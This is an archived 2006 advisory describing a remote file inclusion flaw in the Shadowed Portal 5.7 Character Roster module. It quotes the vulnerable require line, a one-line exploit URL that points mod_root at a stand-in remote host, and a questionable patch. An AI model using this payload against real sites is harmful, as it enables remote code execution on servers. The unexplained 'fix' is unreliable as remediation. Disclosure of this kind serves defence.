Shadowed Portal Module Character Roster (mod

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Shadowed Portal Module Character Roster (mod_root) RFI Vulnerability
# Published : 2006-12-25
# Author : xoron
# Previous Title : Ciberia Content Federator <= 1.0.1 (path) Remote File Include Exploit
# Next Title : myphpNuke Module My_eGallery 2.5.6 (basepath) RFI Vulnerability

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Shadowed Portal 5.7. Roster Module (mod_root) Remote File Include

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Found: Cyber-Security.Org

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Version: 5.7

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
c0DE:

in include.php , line 2.

require($mod_root."/latest_member.php");

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

F!X:

-open include.php

-write this code before wrong code (line 2.)

require("code.php");
if($code != $xcode) {
exit;
}

-save and exit.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

3xplo!t:

/modules/character_roster/include.php?mod_root=http://evil_scripts?

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Reference: http://cyber-security.org/DataDetayAll.asp?Data_id=587

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

script download:

http://www.shad0wed.com/view/load/mod:fs/do:dl/id:7059wc8637mzd9966hnb3dgl415413d7541q4032zp43943532ija77112342xd4961670729851147

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# www.Syue.com [2006-12-25]